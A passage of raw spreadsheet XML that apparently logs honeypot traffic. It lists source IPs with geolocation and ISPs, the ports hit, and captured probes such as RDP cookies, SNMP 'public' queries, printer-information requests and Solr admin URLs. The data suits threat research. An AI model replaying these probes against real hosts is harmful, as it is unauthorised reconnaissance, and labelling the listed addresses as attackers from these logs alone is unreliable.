17&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_POP3_H3&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;445&amp;&amp;27719&amp;&amp;161&amp;&amp;23&amp;&amp;143&amp;&amp;3389&amp;&amp;21&amp;&amp;42070&amp;&amp;1521&amp;&amp;1080&amp;&amp;50389&amp;&amp;110&amp;&amp;NA&amp;&amp;51097&amp;&amp;8443&amp;&amp;3306&amp;&amp;5432&amp;&amp;55103&amp;&amp;57204&amp;&amp;6667&amp;&amp;1433&amp;&amp;55398&amp;&amp;443&amp;&amp;9100&amp;&amp;56326&amp;&amp;389&amp;&amp;49887&amp;&amp;5900&amp;&amp;80&amp;&amp;54282</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA&amp;&amp;query&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zRiPqTXpw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lDWOLM'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VVksVa'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,63116)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,63128)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,63136)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qscdwBLms'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UyqhCw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KfCMEj'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XsKvQZyxy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VWhoDO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OYnQvc'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61190)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61198)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61208)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,59190)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,59202)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,59210)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gUAXAASRH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=STzqvf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rDtDgq'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,62550)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61038)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61044)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61050)}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SJyZxtAjb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uNYMov'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AhCTCM'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:93b9:84e7</t>
  </si>
  <si>
    <t>a6adc0d5016f8048d33578e9edab7df8</t>
  </si>
  <si>
    <t>59.88.25.240</t>
  </si>
  <si>
    <t>::ffff:3b58:19f0</t>
  </si>
  <si>
    <t>43e46d33e971ea344e63a4640d1e93e6</t>
  </si>
  <si>
    <t>209.38.211.222</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;21&amp;&amp;143&amp;&amp;110&amp;&amp;631&amp;&amp;443&amp;&amp;445&amp;&amp;80&amp;&amp;25&amp;&amp;NA</t>
  </si>
  <si>
    <t>Digital Ocean</t>
  </si>
  <si>
    <t>DO-13</t>
  </si>
  <si>
    <t>2024-05-07</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;POST&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': '.'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '209.145.61.177:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://209.145.61.177:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.146.12.172:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.146.12.172:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (209.38.211.222,32010)}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/info/system'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/cores?action=STATUS&amp;wt=json'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/query?q=SHOW+DIAGNOSTICS'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/?pretty'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/_cluster/health?pretty'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '473', 'Content-Type': 'application/xml', 'Host': '5.253.40.123:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '474', 'Content-Type': 'application/xml', 'Host': '94.131.118.77:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/info/system'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/cores?action=STATUS&amp;wt=json'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.118.29:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.79.122:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.79.122:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (209.38.211.222,27522)}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '473', 'Content-Type': 'application/xml', 'Host': '194.4.48.242:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (209.38.211.222,8206)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '473', 'Content-Type': 'application/xml', 'Host': '77.91.74.218:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d126:d3de</t>
  </si>
  <si>
    <t>eb34aa6b5542b7b85a0a495d042a64c8</t>
  </si>
  <si>
    <t>177.6.33.234</t>
  </si>
  <si>
    <t>Gravataí</t>
  </si>
  <si>
    <t>3462089</t>
  </si>
  <si>
    <t>-29.9422</t>
  </si>
  <si>
    <t>-50.9928</t>
  </si>
  <si>
    <t>8167</t>
  </si>
  <si>
    <t>Brasil Telecom S/A - Filial Distrito Federal</t>
  </si>
  <si>
    <t>::ffff:b106:21ea</t>
  </si>
  <si>
    <t>d06df184f92fa79fe34f47d94c8c84bc</t>
  </si>
  <si>
    <t>43.240.21.25</t>
  </si>
  <si>
    <t>23&amp;&amp;43127&amp;&amp;NA</t>
  </si>
  <si>
    <t>Johor</t>
  </si>
  <si>
    <t>Daerah Batu Pahat</t>
  </si>
  <si>
    <t>Parit Raja</t>
  </si>
  <si>
    <t>1732698</t>
  </si>
  <si>
    <t>1.8681</t>
  </si>
  <si>
    <t>103.112</t>
  </si>
  <si>
    <t>::ffff:2bf0:1519</t>
  </si>
  <si>
    <t>b0b745e7206a0d96367f64187f74279e</t>
  </si>
  <si>
    <t>125.227.204.12</t>
  </si>
  <si>
    <t>125-227-204-12.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;41241&amp;&amp;80&amp;&amp;9100&amp;&amp;12997&amp;&amp;45713&amp;&amp;10876&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7de3:cc0c</t>
  </si>
  <si>
    <t>6f9b1466e04afffc68be151689dd3d6c</t>
  </si>
  <si>
    <t>117.251.172.75</t>
  </si>
  <si>
    <t>::ffff:75fb:ac4b</t>
  </si>
  <si>
    <t>a768aa56ce277d78faf5c51d8fd58ffc</t>
  </si>
  <si>
    <t>45.144.212.246</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_POSTGRES_H37</t>
  </si>
  <si>
    <t>389&amp;&amp;5432&amp;&amp;21</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>2019-08-23</t>
  </si>
  <si>
    <t>connection&amp;&amp;command</t>
  </si>
  <si>
    <t>{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}</t>
  </si>
  <si>
    <t>::ffff:2d90:d4f6</t>
  </si>
  <si>
    <t>764ff0e74ae12a7ce42f9b0f06a103ec</t>
  </si>
  <si>
    <t>173.76.169.85</t>
  </si>
  <si>
    <t>Suffolk</t>
  </si>
  <si>
    <t>Boston</t>
  </si>
  <si>
    <t>4930956</t>
  </si>
  <si>
    <t>02112</t>
  </si>
  <si>
    <t>42.3601</t>
  </si>
  <si>
    <t>-71.0589</t>
  </si>
  <si>
    <t>UUNET</t>
  </si>
  <si>
    <t>::ffff:ad4c:a955</t>
  </si>
  <si>
    <t>0dd7e585e165b414997e20be3010552b</t>
  </si>
  <si>
    <t>59.178.0.148</t>
  </si>
  <si>
    <t>::ffff:3bb2:94</t>
  </si>
  <si>
    <t>58a53d45c607d8a3cda69af33dfb4488</t>
  </si>
  <si>
    <t>13.216.239.98</t>
  </si>
  <si>
    <t>ec2-13-216-239-98.compute-1.amazonaws.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dd8:ef62</t>
  </si>
  <si>
    <t>778c25c96173804c93612fec0c110b46</t>
  </si>
  <si>
    <t>79.23.69.153</t>
  </si>
  <si>
    <t>host-79-23-69-153.retail.telecomitalia.it&amp;&amp;NA</t>
  </si>
  <si>
    <t>57</t>
  </si>
  <si>
    <t>The Marches</t>
  </si>
  <si>
    <t>Ascoli Piceno</t>
  </si>
  <si>
    <t>Cupra Marittima</t>
  </si>
  <si>
    <t>3177685</t>
  </si>
  <si>
    <t>43.0191</t>
  </si>
  <si>
    <t>13.8617</t>
  </si>
  <si>
    <t>::ffff:4f17:4599</t>
  </si>
  <si>
    <t>26c9b96e3e4e3dfc77e508d81c99f495</t>
  </si>
  <si>
    <t>187.125.100.211</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H30</t>
  </si>
  <si>
    <t>52492&amp;&amp;1433&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>3451190</t>
  </si>
  <si>
    <t>20000-000</t>
  </si>
  <si>
    <t>-22.9068</t>
  </si>
  <si>
    <t>-43.1729</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,52006)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,58829)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,58924)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,65283)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,61487)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,61548)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,62271)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,62385)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:bb7d:64d3</t>
  </si>
  <si>
    <t>c5a9351a1d54010bef6e38eb64e8d799</t>
  </si>
  <si>
    <t>64.180.142.239</t>
  </si>
  <si>
    <t>d64-180-142-239.bchsia.telus.net</t>
  </si>
  <si>
    <t>Fraser Valley</t>
  </si>
  <si>
    <t>Abbotsford (Highway 11)</t>
  </si>
  <si>
    <t>5881791</t>
  </si>
  <si>
    <t>V2S</t>
  </si>
  <si>
    <t>49.0495</t>
  </si>
  <si>
    <t>-122.286</t>
  </si>
  <si>
    <t>ASN852</t>
  </si>
  <si>
    <t>Telus-Fibre</t>
  </si>
  <si>
    <t>1996-05-18 04:00:00</t>
  </si>
  <si>
    <t>2025-05-19 04:00:00</t>
  </si>
  <si>
    <t>2024-04-17 09:15:57</t>
  </si>
  <si>
    <t>['DNS24.TELUS.CA', 'DNS24.TELUS.COM']</t>
  </si>
  <si>
    <t>::ffff:40b4:8eef</t>
  </si>
  <si>
    <t>d656e638dc8af93aaad053622b6bcaa5</t>
  </si>
  <si>
    <t>117.209.87.137</t>
  </si>
  <si>
    <t>::ffff:75d1:5789</t>
  </si>
  <si>
    <t>484aa278e7b6297a4f8caab39dbbbf7b</t>
  </si>
  <si>
    <t>45.207.172.222</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H45</t>
  </si>
  <si>
    <t>Hongkong Union Information Technology CoLimited</t>
  </si>
  <si>
    <t>Hongkong Union Information Technology Co., Limited</t>
  </si>
  <si>
    <t>2014-12-01</t>
  </si>
  <si>
    <t>::ffff:2dcf:acde</t>
  </si>
  <si>
    <t>192cf9a9bb5d52b49d22293195db8550</t>
  </si>
  <si>
    <t>61.1.135.149</t>
  </si>
  <si>
    <t>::ffff:3d01:8795</t>
  </si>
  <si>
    <t>c15e765492316220b778dc9a459e920e</t>
  </si>
  <si>
    <t>61.98.45.191</t>
  </si>
  <si>
    <t>::ffff:3d62:2dbf</t>
  </si>
  <si>
    <t>aabb78176c5095572935f4c899293324</t>
  </si>
  <si>
    <t>176.91.141.153</t>
  </si>
  <si>
    <t>::ffff:b05b:8d99</t>
  </si>
  <si>
    <t>9d0ac8df62747a3b3a3f8a775688f687</t>
  </si>
  <si>
    <t>182.56.185.131</t>
  </si>
  <si>
    <t>::ffff:b638:b983</t>
  </si>
  <si>
    <t>c9c1906ff7c694e4ebdc6b0b3f141c3d</t>
  </si>
  <si>
    <t>59.125.213.218</t>
  </si>
  <si>
    <t>59-125-213-218.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H6&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;53201&amp;&amp;5900</t>
  </si>
  <si>
    <t>::ffff:3b7d:d5da</t>
  </si>
  <si>
    <t>0f30a5477fcff61daefc6e52dbc99f2e</t>
  </si>
  <si>
    <t>103.10.208.250</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H5</t>
  </si>
  <si>
    <t>5900&amp;&amp;64952&amp;&amp;50395&amp;&amp;52366&amp;&amp;NA</t>
  </si>
  <si>
    <t>Kolkata (Sovabazar)</t>
  </si>
  <si>
    <t>700073</t>
  </si>
  <si>
    <t>22.5969</t>
  </si>
  <si>
    <t>88.3674</t>
  </si>
  <si>
    <t>Meghbela Broadband</t>
  </si>
  <si>
    <t>::ffff:670a:d0fa</t>
  </si>
  <si>
    <t>8def987611947a25873b14478a882946</t>
  </si>
  <si>
    <t>122.117.28.125</t>
  </si>
  <si>
    <t>::ffff:7a75:1c7d</t>
  </si>
  <si>
    <t>4a62c1f6b6b9e8b2a6f972244a423f55</t>
  </si>
  <si>
    <t>183.178.218.19</t>
  </si>
  <si>
    <t>183178218019.ctinets.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>Hong Kong Broadband Network Limited</t>
  </si>
  <si>
    <t>2009-11-26</t>
  </si>
  <si>
    <t>HKBN</t>
  </si>
  <si>
    <t>::ffff:b7b2:da13</t>
  </si>
  <si>
    <t>57cce76fd39413b33c10313a8a5f23e7</t>
  </si>
  <si>
    <t>27.68.62.235</t>
  </si>
  <si>
    <t>Viettel</t>
  </si>
  <si>
    <t>::ffff:1b44:3eeb</t>
  </si>
  <si>
    <t>03164483e67ac07381d727a0018edb9b</t>
  </si>
  <si>
    <t>169.150.196.86</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>CDNEXT</t>
  </si>
  <si>
    <t>DataCamp Limited</t>
  </si>
  <si>
    <t>::ffff:a996:c456</t>
  </si>
  <si>
    <t>d3acf174b69033a00954f261c39f7b58</t>
  </si>
  <si>
    <t>176.237.161.29</t>
  </si>
  <si>
    <t>::ffff:b0ed:a11d</t>
  </si>
  <si>
    <t>bb1223837770084c20bdbe21e40e79a5</t>
  </si>
  <si>
    <t>223.122.90.39</t>
  </si>
  <si>
    <t>22.3615</t>
  </si>
  <si>
    <t>114.133</t>
  </si>
  <si>
    <t>137872</t>
  </si>
  <si>
    <t>PEOPLESPHONE-HK</t>
  </si>
  <si>
    <t>China Mobile Hong Kong Company Limited</t>
  </si>
  <si>
    <t>::ffff:df7a:5a27</t>
  </si>
  <si>
    <t>03a651fd9894898376076b0c1db9d750</t>
  </si>
  <si>
    <t>59.182.109.69</t>
  </si>
  <si>
    <t>::ffff:3bb6:6d45</t>
  </si>
  <si>
    <t>271f29e0ddc271ab70e97dd5a08deca7</t>
  </si>
  <si>
    <t>61.1.245.243</t>
  </si>
  <si>
    <t>::ffff:3d01:f5f3</t>
  </si>
  <si>
    <t>3752114ed9d90dc0cb4059a5617d4a61</t>
  </si>
  <si>
    <t>37.60.136.150</t>
  </si>
  <si>
    <t>Sliven</t>
  </si>
  <si>
    <t>Kotel</t>
  </si>
  <si>
    <t>730073</t>
  </si>
  <si>
    <t>8970</t>
  </si>
  <si>
    <t>42.8833</t>
  </si>
  <si>
    <t>26.45</t>
  </si>
  <si>
    <t>60784</t>
  </si>
  <si>
    <t>Iradeum Trading Ltd.</t>
  </si>
  <si>
    <t>Neterra Ltd</t>
  </si>
  <si>
    <t>::ffff:253c:8896</t>
  </si>
  <si>
    <t>a30263b3a4ec4bdd5bd55ff1083603a6</t>
  </si>
  <si>
    <t>117.192.139.224</t>
  </si>
  <si>
    <t>::ffff:75c0:8be0</t>
  </si>
  <si>
    <t>d86543624cccb03f9609e9ebcf1d9f1e</t>
  </si>
  <si>
    <t>14.96.83.254</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>23&amp;&amp;34994</t>
  </si>
  <si>
    <t>134540</t>
  </si>
  <si>
    <t>Tata Teleservices LTD - Tata Indicom - Cdma Division</t>
  </si>
  <si>
    <t>Tata Teleservices LTD</t>
  </si>
  <si>
    <t>2010-08-31</t>
  </si>
  <si>
    <t>TATATELESERVICES</t>
  </si>
  <si>
    <t>::ffff:e60:53fe</t>
  </si>
  <si>
    <t>32d0bb8517eb4ecc577a8acda96a160a</t>
  </si>
  <si>
    <t>123.18.142.206</t>
  </si>
  <si>
    <t>::ffff:7b12:8ece</t>
  </si>
  <si>
    <t>e40e51d60e23a3380787f449f1c893cd</t>
  </si>
  <si>
    <t>117.209.92.136</t>
  </si>
  <si>
